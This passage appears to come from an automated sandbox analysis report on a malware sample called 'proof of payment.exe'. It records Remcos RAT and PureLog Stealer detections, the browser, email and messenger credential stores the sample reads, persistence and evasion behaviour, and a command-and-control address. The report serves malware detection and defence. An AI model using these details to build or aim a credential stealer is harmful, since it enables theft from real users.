                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerYW\20
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerYW\2
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerYW\j
                    Source: proof of payment.exe, 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerA-PC
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, proof of payment.exe, 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerYW\$
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, proof of payment.exe, 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.drBinary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10002933 cpuid 7_2_10002933
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: EnumSystemLocalesW,12_2_00452036
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_004520C3
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: GetLocaleInfoW,12_2_00452313
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: EnumSystemLocalesW,12_2_00448404
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_0045243C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: GetLocaleInfoW,12_2_00452543
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452610
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: GetLocaleInfoA,12_2_0040F8D1
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: GetLocaleInfoW,12_2_004488ED
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00451CD8
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: EnumSystemLocalesW,12_2_00451F50
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: EnumSystemLocalesW,12_2_00451F9B
                    Source: C:\Users\user\Desktop\proof of payment.exeQueries volume information: C:\Users\user\Desktop\proof of payment.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Users\user\AppData\Roaming\NvbYSEq.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_10002264
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041B60D GetUserNameW,12_2_0041B60D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00449190
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                    Source: C:\Users\user\Desktop\proof of payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.proof of payment.exe.5130000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.5130000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1510214396.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 3640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040BA12
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040BB30
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: \key3.db12_2_0040BB30
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: ESMTPPassword17_2_004033F0
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword17_2_00402DB3
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword17_2_00402DB3
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 4600, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Users\user\Desktop\proof of payment.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYWJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYWJump to behavior
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.proof of payment.exe.5130000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.5130000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1510214396.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: proof of payment.exe PID: 3640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: cmd.exe12_2_0040569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services12
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts12
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Bypass User Account Control                    		11
                    Deobfuscate/Decode Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Access Token Manipulation                    		4
                    Obfuscated Files or Information                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		22
                    Software Packing                    		3
                    Credentials In Files                    		3
                    File and Directory Discovery                    		Distributed Component Object Model211
                    Input Capture                    		1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script222
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets38
                    System Information Discovery                    		SSH3
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Scheduled Task/Job                    		1
                    Bypass User Account Control                    		Cached Domain Credentials131
                    Security Software Discovery                    		VNCGUI Input Capture12
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync31
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                    Process Injection                    		Network Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435940 Sample: proof of payment.exe Startdate: 03/05/2024 Architecture: WINDOWS Score: 100 50 geoplugin.net 2->50 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 19 other signatures 2->72 8 proof of payment.exe 7 2->8         started        12 NvbYSEq.exe 5 2->12         started        signatures3 process4 file5 44 C:\Users\user\AppData\Roaming44vbYSEq.exe, PE32 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmpCCF4.tmp, XML 8->46 dropped 74 Adds a directory exclusion to Windows Defender 8->74 14 proof of payment.exe 3 15 8->14         started        19 powershell.exe 20 8->19         started        21 schtasks.exe 1 8->21         started        76 Antivirus detection for dropped file 12->76 78 Multi AV Scanner detection for dropped file 12->78 80 Contains functionality to bypass UAC (CMSTPLUA) 12->80 82 7 other signatures 12->82 23 NvbYSEq.exe 12->23         started        25 schtasks.exe 1 12->25         started        signatures6 process7 dnsIp8 52 37.120.235.122, 2269, 49708, 49712 SECURE-DATA-ASRO Romania 14->52 54 geoplugin.net 178.237.33.50, 49715, 80 ATOM86-ASATOM86NL Netherlands 14->54 48 C:\ProgramData\remcos\logs.dat, data 14->48 dropped 56 Detected Remcos RAT 14->56 58 Tries to harvest and steal browser information (history, passwords, etc) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Installs a global keyboard hook 14->62 27 proof of payment.exe 14->27         started        30 proof of payment.exe 14->30         started        32 proof of payment.exe 14 14->32         started        42 3 other processes 14->42 64 Loading BitLocker PowerShell Module 19->64 34 